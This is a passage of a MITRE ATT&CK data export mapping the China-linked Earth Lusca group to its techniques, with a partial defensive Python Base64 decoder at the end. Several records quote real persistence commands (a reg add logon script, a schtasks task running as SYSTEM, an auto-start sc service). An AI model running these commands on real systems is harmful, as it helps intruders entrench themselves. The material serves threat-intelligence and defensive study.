Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--7807639f-cc9f-4b0a-9f01-8161cbb1fd53 revoked : False technique : DLL Side-Loading technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. 
Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1574.002 matrix : mitre-attack platform : ['Windows'] data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) modified the registry using the command reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]” for persistence.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--83aedf08-e8eb-4c18-80c1-727ddb0f1d07 revoked : False technique : Modify Registry technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution. Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API. Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. 
(Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017) The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1112 matrix : mitre-attack platform : ['Windows'] data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “[file path]” /ru system for persistence.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--6f1c0538-c9f4-49ad-b934-0714b50c1c45 revoked : False technique : Scheduled Task/Job technique_description : Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). 
Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')] technique_id : T1053 matrix : mitre-attack platform : ['Windows', 'Linux', 'macOS', 'Containers'] data_sources : ['Scheduled Job: Scheduled Job Creation', 'File: File Creation', 'Process: Process Creation', 'Container: Container Creation', 'Command: Command Execution', 'File: File Modification'] permissions_required : ['Administrator', 'SYSTEM', 'User'] effective_permissions : ['SYSTEM', 'Administrator', 'User'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) created a service using the command sc create “SysUpdate” binpath= “cmd /c start “[file path]””&&sc config “SysUpdate” start= auto&&net start SysUpdate for persistence.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--cd85a2d6-ebee-4ebd-9571-5cafcac15b05 revoked : False technique : Windows Service technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. 
For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')] technique_id : T1543.003 matrix : mitre-attack platform : ['Windows'] data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution'] effective_permissions : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 name : Earth Lusca technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command ipconfig to obtain information about network configurations.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--e13ab711-012c-4405-87ae-f096d770e367 revoked : False technique : System Network Configuration Discovery technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g.
show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1016 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 name : Earth Lusca technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) collected information on user accounts via the whoami command.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--5fc9189b-7c9b-43f7-8d60-96a1f497e395 revoked : False technique : System Owner/User Discovery technique_description : Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts.
Environment variables, such as %USERNAME% and $USER, may also be used to access this information. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1033 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access']
----------------------------------------------------------------------------------------------------
type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 name : Earth Lusca technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--b8012238-cfd9-4c5b-8759-8d86f0d6f933 revoked : False technique : Exploit Public-Facing Application technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container.
This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')] technique_id : T1190 matrix : mitre-attack platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers'] data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 name : Earth Lusca technique_ref : attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--4504384f-f832-4ec2-87b0-b8dfc2208083 revoked : False technique : JavaScript technique_description : Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS) JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts) JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs.
As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode) Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027). tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')] technique_id : T1059.007 matrix : mitre-attack platform : ['Windows', 'macOS', 'Linux'] data_sources : ['Module: Module Load', 'Process: Process Creation', 'Script: Script Execution', 'Command: Command Execution'] permissions_required : ['User', 'Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 name : Earth Lusca technique_ref : attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails to potential targets that contained a malicious link.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--cff64310-fe63-44ad-9791-d1b4b50f0229 revoked : False technique : Spearphishing Link technique_description : Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.
Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023) Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. 
(Citation: Microsoft OAuth 2.0 Consent Phishing 2021) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')] technique_id : T1566.002 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS', 'Google Workspace'] data_sources : ['Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 name : Earth Lusca technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Base64 to encode strings.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--c74dfd33-e17a-4fc7-b2bd-154499fc3ac2 revoked : False technique : Obfuscated Files or Information technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.
(Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')] technique_id : T1027 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows'] data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
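The Obfuscated Files or Information (T1027) relationship above records only that Earth Lusca Base64-encoded strings. The triage step a defender actually needs is to find such runs in command lines and see what they decode to. The following is an added example written for this page, not code from MITRE or from the Trend Micro report; the command lines are constructed, and the 20-character minimum run length and the UTF-16LE-first rule (PowerShell's `-EncodedCommand` convention) are the author's assumptions.

```python
import base64
import re
import string

# Runs of Base64 alphabet at least 20 chars long and not glued to other Base64-ish
# characters; shorter runs are mostly ordinary words, hashes or GUID fragments.
_B64_RUN = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{20,}={0,2})(?![A-Za-z0-9+/=])")
_PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}


def _is_text(s):
    return bool(s) and all(c in _PRINTABLE for c in s)


def try_decode(candidate):
    """Return (encoding, text) if the Base64 run decodes to printable text, else None.

    PowerShell's -EncodedCommand carries UTF-16LE, so that is tried first when every
    odd byte is NUL; anything else is tried as UTF-8. Binary data (hashes, keys) is
    rejected so hex digests and random blobs do not become false positives.
    """
    core = candidate.rstrip("=")
    padded = core + "=" * (-len(core) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:          # impossible length/padding (binascii.Error is a ValueError)
        return None
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le", errors="replace")
        if _is_text(text):
            return ("utf-16-le", text)
    try:
        text = raw.decode("utf-8")
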